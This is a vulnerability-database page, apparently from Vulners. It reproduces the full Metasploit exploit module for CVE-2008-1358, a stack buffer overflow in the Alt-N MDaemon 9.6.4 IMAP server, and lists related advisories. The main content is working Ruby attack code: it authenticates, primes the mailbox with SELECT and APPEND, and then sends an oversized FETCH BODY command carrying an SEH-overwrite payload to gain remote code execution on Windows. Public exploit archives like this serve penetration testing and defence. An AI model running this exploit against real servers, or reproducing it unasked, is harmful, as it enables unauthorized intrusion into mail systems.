Lucene search
K

MDaemon 9.6.4 IMAPD FETCH Buffer Overflow

🗓️ 06 Apr 2008 10:45:29Reported by Jacopo Cervini, aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 19 Views

MDaemon 9.6.4 IMAPD FETCH Buffer Overflow, Stack buffer overflow in Alt-N MDaemon IMAP Server 9.6.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-1358
13 Mar 200800:00
circl
Check Point Advisories
Preemptive Protection against Alt-N MDaemon IMAP Server FETCH Command Buffer Overflow Vulnerability
24 Mar 200800:00
checkpoint_advisories
Check Point Advisories
Alt-N MDaemon IMAP Server FETCH Command Buffer Overflow (CVE-2008-1358)
30 Dec 200900:00
checkpoint_advisories
CVE
CVE-2008-1358
17 Mar 200817:00
cve
Cvelist
CVE-2008-1358
17 Mar 200817:00
cvelist
Exploit DB
Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)
15 Jun 201000:00
exploitdb
Tenable Nessus
MDaemon IMAP Server FETCH Command Remote Buffer Overflow
21 Mar 200800:00
nessus
NVD
CVE-2008-1358
17 Mar 200817:44
nvd
Packet Storm
MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
26 Nov 200900:00
packetstorm
Prion
Stack overflow
17 Mar 200817:44
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Imap
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MDaemon 9.6.4 IMAPD FETCH Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server
        version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP
        account credentials are required. Credit to Matteo Memelli
      },
      'Author'         => [ 'Jacopo Cervini', 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-1358' ],
          [ 'OSVDB', '43111' ],
          [ 'BID', '28245' ],
          [ 'EDB', '5248' ]
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a])",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MDaemon Version 9.6.4', { 'Ret' => 0x64dc118b } ], # p/p/r HashCash.dll
        ],
      'DisclosureDate' => '2008-03-13',
      'DefaultTarget' => 0))
  end

  def check
    connect
    disconnect

    if (banner and banner =~ /IMAP4rev1 MDaemon 9\.6\.4 ready/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login

    req0="0002 SELECT Inbox\r\n"

    res = raw_send_recv(req0)
    if (res and res =~ /0002 OK/)
      print_status("SELECT command OK")
    end

    req1="0003 APPEND Inbox {1}\r\n"

    res = raw_send_recv(req1)
    if (res and res =~ /Ready for append literal/)
      print_status("APPEND command OK")
    end

    res = raw_send_recv(rand_text_alpha(20) + "\r\n")
    if (res and res =~ /APPEND completed/)
      print_status("APPEND command finished")
    end

    buf = rand_text_alpha_upper(528, payload_badchars)
    buf << generate_seh_payload(target.ret) + rand_text_alpha_upper(35, payload_badchars)

    sploit = "A654 FETCH 2:4 (FLAGS BODY[" + buf + "(DATE FROM)])\r\n"

    print_status("Sending payload")

    sock.put(sploit)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation